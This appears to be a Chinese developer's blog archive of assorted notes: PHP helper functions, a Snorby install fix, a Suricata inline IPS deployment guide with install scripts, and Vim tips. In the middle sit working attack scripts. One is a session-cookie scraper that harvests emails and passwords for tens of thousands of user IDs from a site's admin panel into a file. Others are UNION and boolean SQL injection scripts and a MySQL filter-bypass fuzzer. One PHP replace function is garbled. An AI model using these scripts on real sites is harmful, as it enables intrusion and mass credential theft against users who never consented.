月度归档:2016年12月
snorby mark
在
bundle exec rake snorby:setup
这一步时始终过不去。
报
No time_zone specified in snorby_config.yml; detected time_zone: US/Eastern 3dd9afd796731d9f406d9cec0088c86e90995d4024acb27fa8710c99a48c1f73e431b6d8957a8de011cad066565c19354c85c5700378efc75d9ca15de46ae2ee [datamapper] Created database 'snorby' rake aborted! TypeError: no implicit conversion of Fixnum into String
看了几遍代码, 没问题,
偶然想到数据库密码为123456
原config/database.yml为:
snorby: &snorby adapter: mysql username: root password: 123456 host: localhost
改为 密码加上双引号:
snorby: &snorby adapter: mysql username: root password: "123456" host: localhost
php mark
#php 日期转换成TZ格式
// Current UTC time in ISO 8601 / RFC 3339 form with a literal "Z" suffix,
// e.g. 2020-07-21T12:11:11Z. gmdate() always renders UTC, so the "+00:00"
// offset that the 'c' format appends is swapped for "Z".
$time_tz_str = preg_replace('/\+00:00$/', 'Z', gmdate('c'));
#trim 移除字符串
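/**
 * Strip one occurrence of $removestring from the start and/or end of $string.
 *
 * Non-string arguments are returned unchanged. $removestring is matched as a
 * literal (it is preg_quote()d with the "/" delimiter), so characters such as
 * "/", "." or "(" can neither break the pattern nor act as regex
 * metacharacters; an empty $removestring leaves $string untouched.
 *
 * @param mixed $string       Value to trim; returned untouched when not a string.
 * @param mixed $removestring Literal text to remove from both ends.
 * @return mixed The trimmed string, or the original value when a non-string was passed.
 */
function strim($string, $removestring)
{
    if (!is_string($string) || !is_string($removestring)) {
        return $string;
    }
    if ($removestring === '') {
        // The original pattern would be "/^|$/", a no-op; return early instead.
        return $string;
    }
    $literal = preg_quote($removestring, '/');
    return preg_replace("/^{$literal}|{$literal}$/", '', $string);
}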
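# Improved variant of strim(): with no $removestring it falls back to trim().
/**
 * Strip one occurrence of $removestring from the start and/or end of $string,
 * or whitespace-trim $string when no removal text is given.
 *
 * $removestring is matched as a literal (preg_quote()d with the "/" delimiter),
 * so "/", "." or "(" can neither break the pattern nor act as regex
 * metacharacters. Only an empty string (or null / a non-scalar) selects the
 * trim() fallback; the original truthiness test (!$removestring) sent "0" down
 * that path too, so strim('0x0', '0') returned '0x0' instead of 'x'.
 *
 * @param mixed $string       Value to trim; returned untouched when not a string.
 * @param mixed $removestring Literal text to remove from both ends; '' means trim().
 * @return mixed The trimmed string, or the original value when a non-string was passed.
 */
function strim($string, $removestring = '')
{
    if (!is_string($string)) {
        return $string;
    }
    if (!is_scalar($removestring) || (string) $removestring === '') {
        return trim($string);
    }
    $literal = preg_quote((string) $removestring, '/');
    return preg_replace("/^{$literal}|{$literal}$/", '', $string);
}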
#curl request
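/**
 * Perform an HTTP(S) request with cURL and return the response body.
 *
 * Sends a GET, or a POST when $post is non-empty. Redirects are followed.
 *
 * @param string       $url          Target URL.
 * @param string|array $post         Payload handed straight to CURLOPT_POSTFIELDS
 *                                   (an array is sent as multipart/form-data); '' means GET.
 * @param string       $cookie       Raw Cookie header value such as "a=1; b=2"; '' sends none.
 * @param int          $returnCookie When truthy, response headers are requested and the
 *                                   result is ['cookie' => first Set-Cookie value, 'content' => body].
 * @param bool         $verifySsl    Verify the peer certificate and hostname (default true).
 *                                   The original hard-coded CURLOPT_SSL_VERIFYPEER = FALSE,
 *                                   which accepts any certificate and lets an on-path attacker
 *                                   read or alter the exchange; pass false only for a lab host
 *                                   with a self-signed certificate.
 * @return string|array Body, or the ['cookie', 'content'] pair when $returnCookie is set.
 *                      On a transport error the cURL error message is returned as a string
 *                      (kept for compatibility; callers cannot tell it from a body, so
 *                      compare against curl's known messages or switch to exceptions).
 */
function curl_request($url, $post = '', $cookie = '', $returnCookie = 0, $verifySsl = true)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)');
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
    curl_setopt($curl, CURLOPT_REFERER, "http://XXX");
    if ($post) {
        curl_setopt($curl, CURLOPT_POST, 1);
        //curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
    }
    if ($cookie) {
        curl_setopt($curl, CURLOPT_COOKIE, $cookie);
    }
    curl_setopt($curl, CURLOPT_HEADER, $returnCookie);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    // TLS: CURLOPT_SSL_VERIFYHOST must be 2 for a real hostname check (the
    // original value 1 is not accepted by current libcurl). Both checks are
    // on unless the caller explicitly opts out; http:// URLs are unaffected.
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, $verifySsl ? true : false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, $verifySsl ? 2 : 0);
    $data = curl_exec($curl);
    if (curl_errno($curl)) {
        // Read the message before releasing the handle; the original returned
        // without curl_close() here and leaked it.
        $error = curl_error($curl);
        curl_close($curl);
        return $error;
    }
    curl_close($curl);
    if (!$returnCookie) {
        return $data;
    }
    // CURLOPT_HEADER prepends the response headers; split them from the body at
    // the first blank line. With FOLLOWLOCATION several header blocks may precede
    // the body, in which case the first block (not the final response) is parsed -
    // unchanged from the original behaviour.
    $parts = explode("\r\n\r\n", $data, 2);
    $header = $parts[0];
    $body = isset($parts[1]) ? $parts[1] : '';
    preg_match_all("/Set\-Cookie:([^;]*);/", $header, $matches);
    $info = array();
    // substr(..., 1) drops the space after "Set-Cookie:" as in the original;
    // the isset() guard avoids an undefined-index notice when no cookie was set.
    $info['cookie'] = isset($matches[1][0]) ? substr($matches[1][0], 1) : '';
    $info['content'] = $body;
    return $info;
}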
#php remove bom str
/**
 * Drop a leading UTF-8 byte-order mark (EF BB BF) from $str, if present.
 *
 * @param string $str Input text.
 * @return string $str without its BOM, or unchanged when it has none.
 */
function str_remove_bom($str)
{
    $utf8Bom = "\xEF\xBB\xBF";
    if (substr($str, 0, 3) === $utf8Bom) {
        return substr($str, 3);
    }
    return $str;
}
#php实现内存地址反转
/**
 * Reverse the byte order of a hex string (little-endian <-> big-endian
 * rendering of an address): "0a0b0c" becomes "0c0b0a".
 *
 * @param string $hex Hex digits, two per byte.
 * @return string The byte pairs in reverse order.
 */
function array_endtostart($hex)
{
    $bytePairs = str_split($hex, 2);
    return implode('', array_reverse($bytePairs));
}
#php 实现汇编中的pxor
/**
 * XOR two hex strings byte by byte (the pxor of a 128-bit register) and
 * return the result as lowercase hex.
 *
 * @param string $a Hex digits, two per byte.
 * @param string $b Hex digits with at least as many pairs as $a.
 * @return string Hex encoding of $a XOR $b, same length as $a.
 */
function xortnew($a, $b)
{
    $pairsA = str_split($a, 2);
    $pairsB = str_split($b, 2);
    $out = '';
    foreach ($pairsA as $idx => $hexA) {
        $xored = hex2bin($hexA) ^ hex2bin($pairsB[$idx]);
        $out .= bin2hex($xored);
    }
    return $out;
}
var_dump(xortnew("3e213b21343d3c3e00000002253a600c", "0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c"));
#php 查找字符串与替换
/**
 * Rewrite the text inside <pre>...</pre> blocks of $str.
 *
 * Only the matched <pre> span is touched; the rest of the document passes
 * through unchanged. Tabs become a single space. NOTE(review): the remaining
 * four preg_replace() calls appear to replace ', #, " and ' with the very same
 * character - the replacement strings were most likely HTML entity references
 * that got decoded when this page was rendered. Confirm against the original
 * source before relying on them.
 *
 * @param string $str HTML document or fragment.
 * @return string The document with its <pre> span rewritten.
 */
function tapreplace($str){
    // Greedy with the /s modifier: a single match from the first "<pre" to the
    // last "</pre>", so several <pre> blocks (and everything between them) are
    // processed as one span.
    $newstr=preg_replace_callback("/(<pre.*<\/pre>)/s",function ($match){
        $text=preg_replace("/\t/"," ",$match[0]);
        $text=preg_replace("/'/","'",$text);
        $text=preg_replace("/#/","#",$text);
        $text=preg_replace("/\"/",""",$text);
        $text=preg_replace("/'/","'",$text);
        return $text;
    },$str);
    return $newstr;
}
#dokuwiki在php7下报operator not supported for strings in 错
inc\lessc.inc.php
public $importDir = ''; #改为 public $importDir = array();
#CryptoJS 与php互通
#CryptoJS 中 #128位AES加密 var key = CryptoJS.lib.WordArray.random(16); var iv = CryptoJS.lib.WordArray.random(16); var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv}); #php: $key_str = hex2bin('xxxxxxx'); $iv_str = hex2bin('xxxxxxx'); $str="xxxxx"; $result =openssl_decrypt($str,'aes-128-cbc',$key_str,false,$iv_str); #192 aes var key = CryptoJS.lib.WordArray.random(24); var iv = CryptoJS.lib.WordArray.random(16); var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv}); #php: $key_str = hex2bin('xxxxxxx'); $iv_str = hex2bin('xxxxxxx'); $str="xxxxx"; $result =openssl_decrypt($str,'aes-192-cbc',$key_str,false,$iv_str); #256 aes: var key = CryptoJS.lib.WordArray.random(32); var iv = CryptoJS.lib.WordArray.random(16); var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv}); #php: $key_str = hex2bin('xxxxxxx'); $iv_str = hex2bin('xxxxxxx'); $str="xxxxx"; $result =openssl_decrypt($str,'aes-256-cbc',$key_str,false,$iv_str);
#php try catch warning
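// Turn PHP warnings/notices into exceptions so they can be caught with try/catch.
// Handler signature: PHP 8 no longer passes a fifth $errcontext argument, so it
// must not be a required parameter (the original declared `array $errcontext`,
// which raises ArgumentCountError on every error under PHP 8).
set_error_handler(function ($errno, $errstr, $errfile, $errline) {
    // Error not included in the current error_reporting() mask: this is also how
    // the @-operator manifests (PHP 7 sets the mask to 0, PHP 8 to a fixed subset),
    // so respect it and fall back to PHP's normal handling.
    if (!(error_reporting() & $errno)) {
        return false;
    }
    throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
});
// After installing the handler a plain try/catch is enough: a warning from
// preg_match() (e.g. an invalid $rule) now lands in the catch block.
// NOTE(review): $rule is interpolated into the pattern unquoted; if it can come
// from untrusted input, wrap it in preg_quote($rule, '/').
try {
    if (preg_match("/{$rule}/", $result['url'])) {
        $end['match'] = 1;
        $end['code_error'] = 0;
    }
    if ($result['code'] == 404) {
        $end['code_error'] = 1;
    }
} catch (Exception $e) {
    var_dump($rule);
}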
#数组对象转换
/**
 * Recursively convert an array (and any nested arrays/objects) to stdClass.
 *
 * @param array $arr Array to convert.
 * @return object|null stdClass tree, or null when $arr is not an array.
 */
function array_to_object($arr)
{
    if (!is_array($arr)) {
        return;
    }
    $converted = $arr;
    foreach ($converted as $key => $value) {
        if (is_array($value) || is_object($value)) {
            // A nested object goes through array_to_object() too, which yields
            // null for a non-array, so it ends up as an empty stdClass.
            $converted[$key] = (object) array_to_object($value);
        }
    }
    return (object) $converted;
}

/**
 * Recursively convert an object (and any nested objects/arrays) to an array.
 *
 * @param object $obj Object to convert.
 * @return array|null Nested array, or null as soon as a resource value is met.
 */
function object_to_array($obj)
{
    $asArray = (array) $obj;
    foreach ($asArray as $key => $value) {
        if (is_resource($value)) {
            return;
        }
        if (is_object($value) || is_array($value)) {
            $asArray[$key] = (array) object_to_array($value);
        }
    }
    return $asArray;
}
#一个无极限分类
/**
 * Build an unlimited-depth tree from a flat list of rows.
 *
 * Each row is looked up by $item['pro_id'] (its own id) and $item['pid'] (its
 * parent's id), so $result has to be keyed by 'pro_id' - NOTE(review): this is
 * not enforced here; confirm at the caller.
 *
 * Children are attached by reference into the parent's 'son' list, so the
 * returned roots see every descendant without copying; rows whose 'pid' is
 * absent from $result become roots.
 *
 * @param array $result Flat rows keyed by 'pro_id'.
 * @return array List of root rows, each with nested 'son' arrays.
 */
function get_tree($result){
    $tree = array();
    foreach($result as $item){
        if(isset($result[$item['pid']])){
            // Reference, not copy: later iterations may still add children to this row.
            $result[$item['pid']]['son'][] = &$result[$item['pro_id']];
        }else{
            $tree[] = &$result[$item['pro_id']];
        }
    }
    return $tree;
}
//Generates the unlimited-depth data
//Renders the processed data recursively
/**
 * Echo the tree, one row per line, indented ($level + 1) times and followed by <br>.
 *
 * @param array $data  Rows as produced by get_tree().
 * @param int   $level Current depth; drives the indent. Defaults to 0.
 * @return void
 */
function getviewdata($data,$level=0){
    foreach($data as $key=>$value){
        for($i=0;$i<=$level;$i++){
            echo '  ';
        }
        // NOTE(review): printed as raw HTML - escape with htmlspecialchars() if
        // 'pro_name' can originate from user input.
        echo $value['pro_name'];
        echo '<br>';
        if(!empty($value['son'])){
            getviewdata($value['son'],$level+1);
        }
    }
}
getviewdata($xx);
#某脱库脚本
function getuidinfo($i){ sleep(0.5); $url="http://www.xxx.cn/admin.php?s=/product/order/index/uid/{$i}"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx'); curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24'); curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77'); $output = curl_exec($ch); curl_close($ch); preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result); if(!isset($result[0][0]) || !$result[0][0]){ return array(); } $tmp_array= explode("\n",$result[0][0]); if(!$tmp_array){ return array(); } $result_out=array(); foreach ($tmp_array as $a_tmp){ $a_tmp = trim($a_tmp); if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){ continue; } preg_match('#^<td>\d+</td><td>.*</td><td>(.*)</td><td>\d+\.\d+</td><td>[^<]*</td><td>[^<]*</td><td><a[^>]*>([^<]*)</a></td>#',$a_tmp,$a_result); $result_out[]=$a_result[1]; $account_name = $a_result['2']; } if (!isset($account_name)){ return array(); } $result_out=array_unique($result_out); $return['email']=$account_name; $return['pid']=$result_out; return $return; } function getproduct($product_id){ sleep(0.5); $url="http://www.xxx.cn/admin.php?s=/product/user/index&keyword={$product_id}"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx'); curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24'); curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77'); $output = curl_exec($ch); curl_close($ch); preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result); if(!isset($result[0][0]) || !$result[0][0]){ return 
array(); } $tmp_array= explode("\n",$result[0][0]); if(!$tmp_array){ return array(); } $result=array(); foreach ($tmp_array as $a_tmp){ $a_tmp = trim($a_tmp); if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){ continue; } preg_match('#^<td>\d+</td><td><a[^>]*>[^<]*</a></td><td>[^<]*</td><td>([^<]*)</td>#',$a_tmp,$a_result); $result=$a_result[1]; } if(!$result){ return array(); } return $result; } for($i=1;$i<32167;$i++){ $uidinfo = getuidinfo($i); if(!$uidinfo){ continue; } echo $i."\n"; $strs = "uid:{$i} email:".$uidinfo['email'].":"; $pwd_tmp=array(); foreach($uidinfo['pid'] as $pid){ $pwd = getproduct($pid); if(!$pwd){ continue; } $pwd_tmp[]=$pwd; } $pwd_tmp=array_unique($pwd_tmp); $pwd_str =implode("|",$pwd_tmp); $strs .=$pwd_str."\n"; file_put_contents("pwd.txt",$strs,8); sleep(0.5); }
#thinkphp路由模式
http://www.xxx.net/product/index/xxx/id/29192 => http://www.xxx.net/index.php?m=product&c=index&a=xxx&id=29192
#跑表名
set_time_limit(0); $tables = file("tables"); foreach ($tables as $a_tables){ $a_tables = trim($a_tables); $url = "http://www.xxx.net/product/index/xxx/id/29192) and 1=1 and 1=2 union select 29192,29192,29192,2,2,4,5,(select id from ss_{$a_tables} where id>1 limit 0,1 ),7,8,9,10,2 -- a"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4'); $output = curl_exec($ch); curl_close($ch); $garbage = strstr($output, "exist"); if($garbage == false) { echo $a_tables."<br>"; } sleep(2); }
#inject
$i = $_GET['id']; sleep(1); $url = "http://xxx.xxx.net/xxx/index/xxx/id/29192) and 1={$i} --"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4'); $output = curl_exec($ch); curl_close($ch); print_r($output);
#fuzz1
<?php $con=mysqli_connect("localhost","root","123456","test"); if (mysqli_connect_errno($con)) { echo 111; exit; } for($i=0;$i<255;$i++) { for($j=0;$j<255;$j++) { $char_str = chr($i); $charj_str = chr($j); $strs = "select count(*) from `information_schema`{$char_str}{$charj_str}`SCHEMATA`"; $result=mysqli_query($con,$strs); $posts = array(); while($row = @mysqli_fetch_array($result)) { $posts[] = $row; } if(isset($posts[0]) && $posts[0][0]==10 ){ echo "<font color=red>aaaa</font>{$i}|{$j}<br>"; } } } mysqli_close($con);
#毫秒
// Millisecond fraction of the current second, zero-padded to three digits.
// microtime() without an argument returns "msec sec", e.g. "0.12345600 1600000000".
$parts = explode(' ', microtime());
$usec = $parts[0];
$sec = $parts[1];
$lusec = str_pad((string) (int) ($usec * 1000), 3, '0', STR_PAD_LEFT);
iptable 流程1
suricata nat下部署
Mark:
实验环境:
最好两台真机,至少一台虚拟机一台真机,不推荐两台实验环境都为虚拟机(两台都是虚拟机时, route表中的路由可能不会生效)
A:172.20.8.42 IPS (功能)
B:172.20.8.8 pc
要求: B -> A -> internet。B若访问的地址存在攻击行为,则阻断
A:
#安装suricata
# Build and install Suricata 3.2 from source with NFQUEUE (inline IPS) support.
apt-get install libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0   # resolve build dependencies
wget https://github.com/inliniac/suricata/archive/suricata-3.2.zip
unar suricata-3.2.zip
# NOTE(review): the one-shot script further down enters "suricata-suricata-3.2"
# after unpacking the same archive - check which directory name the archive produces.
cd suricata-3.2
git clone https://github.com/OISF/libhtp.git   # suricata depends on libhtp; clone it into the suricata source tree
./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var
make
make install
make install-conf
make install-rules
ldconfig
#配置转发环境
# Enable IPv4 forwarding so A can route B's traffic. Writing to /proc takes
# effect immediately but is not persisted across reboots.
echo 1 > /proc/sys/net/ipv4/ip_forward
#配置iptables
# Hand every packet on INPUT, OUTPUT and FORWARD to NFQUEUE (queue 0, the queue
# Suricata is started with below) so it can issue an inline verdict.
# NOTE(review): packets queued to NFQUEUE with no userspace listener are dropped,
# so if Suricata is not running the box loses all connectivity, including its own
# INPUT/OUTPUT. Adding --queue-bypass to the NFQUEUE target lets traffic pass while
# nothing is bound to the queue, if fail-open is acceptable for this deployment.
iptables -I INPUT -j NFQUEUE && iptables -I OUTPUT -j NFQUEUE && iptables -I FORWARD -j NFQUEUE && iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j NFQUEUE
# To run in IDS (monitor-only) mode, replace NFQUEUE with ACCEPT.
# Source NAT for the forwarded traffic; without this step no packets are captured.
# NOTE(review): the -s address (172.20.8.5) differs from host B (172.20.8.8) in the
# setup above - confirm which one is intended.
iptables -t nat -A POSTROUTING -s 172.20.8.5 -j SNAT --to 172.20.8.42
# Original comment: put the NIC in promiscuous mode. NOTE(review): "-promisc"
# clears the flag; "ifconfig eth0 promisc" (no dash) sets it.
ifconfig eth0 -promisc
#修改suricata配置
#suricata.yaml HOME_NET: "![172.20.0.0/16]" #HOME_NET 把外部地址当成目标为自己的就能匹配rules
#启动
# Start Suricata inline, reading from NFQUEUE queue 0 (-q 0) - the queue the
# iptables rules above send packets to. Without -D it stays in the foreground.
suricata -c /etc/suricata/suricata.yaml -q 0
B:
把电脑的网关设置为 172.20.8.42 就行了
#测试注意
最好用浏览器测试:http://xxx.com/xxx.php?id=1 and 1=2 union select id from test where id=1 在/var/log/suricata/fast.log 文件出现记录表示成功
若用curl命令行测试 则应为 curl "http://xxx.com/xxx.php?id=1%20and%201=2%20union%20select%20id%20from%20test%20where%20id=1" #命令行下不会自动把空格转义为%20 若不添加 suricata 识别不了 匹配不了rules
#更新
功能尽量装全
# Fuller build: extra -dev packages and configure switches so the optional
# features (lua, geoip, prelude, profiling, unit tests, python) are compiled in.
apt-get install libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libprelude-dev liblua5.1-dev libgeoip-dev libhiredis-dev libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0
# NOTE(review): --enable-debug / --enable-debug-validation / --enable-profiling-locks
# are development switches and cost throughput; drop them for a production sensor.
./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-unittests --enable-python --enable-debug --enable-debug-validation --enable-profiling --enable-profiling-locks --enable-lua --enable-geoip --enable-pie --enable-prelude
另在NAT转发下会导致服务端丢失真实源IP,所以另拿一台机器做分析,用iptables做端口镜像(或者daemonlogger)
# Mirror web traffic to the analysis box at 172.20.8.147 with the TEE target:
# replies arriving on INPUT (source port 80) and requests leaving on OUTPUT
# (destination port 80).
iptables -A INPUT -i eth0 -p tcp -m tcp --sport 80 -j TEE --gateway 172.20.8.147
iptables -A OUTPUT -o eth0 -p tcp -m tcp --dport 80 -j TEE --gateway 172.20.8.147
# Note: both INPUT and OUTPUT have to be mirrored. It is the same situation as NAT
# without the iptables source-address rewrite: only one direction (INPUT) is seen,
# and Suricata then performs no protocol analysis on the flow.
#若只镜像注入的流量,则在suricata.yaml文件中 不过功能会有BUG,建议镜像双向流量
--set stream.async-oneside=true
#另附suricata snort 一键安装脚本
apt-get install wkhtmltopdf gcc g++ build-essential libssl-dev libreadline6-dev zlib1g-dev libsqlite3-dev libxslt-dev libxml2-dev imagemagick git-core libmysqlclient-dev libmagickwand-dev default-jre ruby ruby-dev libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libprelude-dev liblua5.1-dev libgeoip-dev libhiredis-dev mysql-server apache2 apache2-dev libapr1-dev libaprutil1-dev libcurl4-openssl-dev libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev git pkg-config libnss3-dev libnspr4-dev wget mysql-client libmysqlclient-dev libdumbnet-dev libmysqlclient18 flex bison libpq-dev postgresql-server-dev-all libdnet-dev unar #install suricata begin cd /tmp wget https://github.com/inliniac/suricata/archive/suricata-3.2.zip unar suricata-3.2.zip cd suricata-suricata-3.2 git clone https://github.com/OISF/libhtp.git #suricata 信赖libhtp 放到suricata项目目录中 ./autogen.sh ./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-unittests --enable-python --enable-debug --enable-debug-validation --enable-profiling --enable-profiling-locks --enable-lua --enable-geoip --enable-pie --enable-prelude make make install make install-conf make install-rules ldconfig sed -i "s|windows: [0.0.0.0/0].*|#windows: [0.0.0.0/0]|g" /etc/suricata/suricata.yaml perl -0777 -i -pe "s/- unified2-alert:\s*enabled:.*/- unified2-alert:\n enabled: yes/g" /etc/suricata/suricata.yaml #install suricata end #install snorby begin gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 curl -sSL https://get.rvm.io | bash -s stable source /etc/profile.d/rvm.sh rvm install ruby-2.2.4 rvm use ruby-2.2.4 --default gem 
sources --add https://gems.ruby-china.org/ --remove https://rubygems.org/ gem install thor i18n bundler tzinfo builder memcache-client rack rack-test erubis mail rack-mount rails sqlite3 arel ezprint rake activesupport minitest bundle config mirror.https://rubygems.org https://gems.ruby-china.org git clone http://github.com/Snorby/snorby.git --depth=1 /var/www/snorby cp /var/www/snorby/config/database.yml.example /var/www/snorby/config/database.yml cp /var/www/snorby/config/snorby_config.yml.example /var/www/snorby/config/snorby_config.yml sed -i "s/password: .*\$/password: \"123456\"/" /var/www/snorby/config/database.yml sed -i "s/domain: .*\$/domain: 'localhost:3000'/" /var/www/snorby/config/snorby_config.yml sed -i "s/wkhtmltopdf: .*\$/wkhtmltopdf: wkhtmltopdf/" /var/www/snorby/config/snorby_config.yml sed -i "s#rules:#rules: \n - \"/etc/suricata/rules/\"#g" /var/www/snorby/config/snorby_config.yml cd /var/www/snorby/ && bundle update activesupport railties rails cd /var/www/snorby/ && bundle install cd /var/www/snorby/ && bundle exec rake snorby:setup RAILS_ENV=production chown www-data:www-data /var/www/snorby -R cat <<EOT >> /etc/apache2/sites-available/snorby.conf <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/snorby/public <Directory "/var/www/snorby/public"> AllowOverride all Order deny,allow Allow from all Options -MultiViews </Directory> </VirtualHost> EOT a2dissite 000-default.conf a2ensite snorby.conf gem install --no-ri --no-rdoc passenger cd /var/www/snorby/ && passenger-install-apache2-module -a 2> /tmp/.passenger_error.txt 1> /tmp/.passenger_compile_out sed -n '/LoadModule passenger_module \/usr\//,/<\/IfModule>/p' /tmp/.passenger_compile_out > /etc/apache2/mods-available/passenger.load a2enmod passenger a2enmod rewrite service apache2 restart cd /var/www/snorby/ && bundle pack cd /var/www/snorby/ && bundle install --path vender/cache service apache2 restart #install snorby end #install barnyard2 begin cd /tmp wget -q 
https://www.snort.org/downloads/snort/daq-2.0.6.tar.gz if [ -d "/tmp/daq-2.0.6" ]; then rm -r /tmp/daq-2.0.6 fi tar xzf daq-2.0.6.tar.gz cd daq-2.0.6 ./configure && make && make install ln -s /usr/include/dumbnet.h /usr/include/dnet.h cd /tmp/ && git clone https://github.com/firnsy/barnyard2 --depth=1 cd barnyard2 ./autogen.sh autoreconf --force --install ./configure --with-mysql --with-mysql-libraries=/usr/lib/x86_64-linux-gnu/ make && make install cp /tmp/barnyard2/etc/barnyard2.conf /etc/suricata/ sed -i "s/#config interface:\s\+eth0/config interface: eth0/g" /etc/suricata/barnyard2.conf sed -i "s/#config daemon/config daemon/g" /etc/suricata/barnyard2.conf sed -i "s/#config verbose/config verbose/g" /etc/suricata/barnyard2.conf sed -i "s;#config waldo_file:.*;config waldo_file: /var/log/suricata/suricata.waldo;" /etc/suricata/barnyard2.conf sed -i "s#config reference_file:\s\+/etc/.*#config reference_file: /etc/suricata/reference.config#g" /etc/suricata/barnyard2.conf sed -i "s#config classification_file:\s\+/etc/.*#config classification_file: /etc/suricata/classification.config#g" /etc/suricata/barnyard2.conf sed -i "s#config gen_file:\s\+/etc/.*#config gen_file: /etc/suricata/rules/gen-msg.map#g" /etc/suricata/barnyard2.conf sed -i "s#config sid_file:\s\+/etc/.*#config sid_file: /etc/suricata/rules/sid-msg.map#g" /etc/suricata/barnyard2.conf echo "output database: log, mysql, user=root password=123456 dbname=snorby host=localhost sensor_name=sensor1" >> /etc/suricata/barnyard2.conf mkdir /var/log/barnyard2 cat << 'EOT' >> /etc/init.d/barnyard2 #!/bin/sh case $1 in start) echo "starting $0..." sudo barnyard2 -c /etc/suricata/barnyard2.conf -d /var/log/suricata -f unified2.alert -w /var/log/suricata/suricata.waldo echo -e 'done.' ;; stop) echo "stopping $0..." killall barnyard2 echo -e 'done.' 
;; restart) $0 stop $0 start ;; *) echo "usage: $0 (start|stop|restart)" ;; esac EOT chmod 700 /etc/init.d/barnyard2 update-rc.d barnyard2 defaults 21 00 #install end begin cd /var/www/snorby bundle exec rake snorby:update RAILS_ENV=production suricata -c /etc/suricata/suricata.yaml -i eth0 -D barnyard2 -c /etc/suricata/barnyard2.conf -d /var/log/suricata -f unified2.alert -w /var/log/suricata/suricata.waldo -D
#开机启动snorby worker
# Run at boot to keep the Snorby worker going: load RVM, select the Ruby used
# for the install, and run snorby:update from the application directory.
source /etc/profile.d/rvm.sh
rvm use ruby-2.2.4 --default
cd /var/www/snorby
bundle exec rake snorby:update RAILS_ENV=production
#mark
VIM mark
#vim的搜索是否区分大小写
#大小写检索:默认是区分大小写的 :set ignorecase 或者 :set ic #恢复区分大小写: :set noignorecase 或者 :set noic
#vim中删除不包含关键字的行 刚好与g 命令相反
:g/pattern/d 是找到pattern, 删之 :v/pattern/d 是找到非pattern,删之
#vim中删除关键字的行
:g/xxxx/d :g/^xxxx/d :g/xxxx$/d
#修改默认 mouse=v
#文件位置:/usr/share/vim/vim81/defaults.vim if has('mouse') set mouse=a endif #改为 if has('mouse') set mouse=v endif
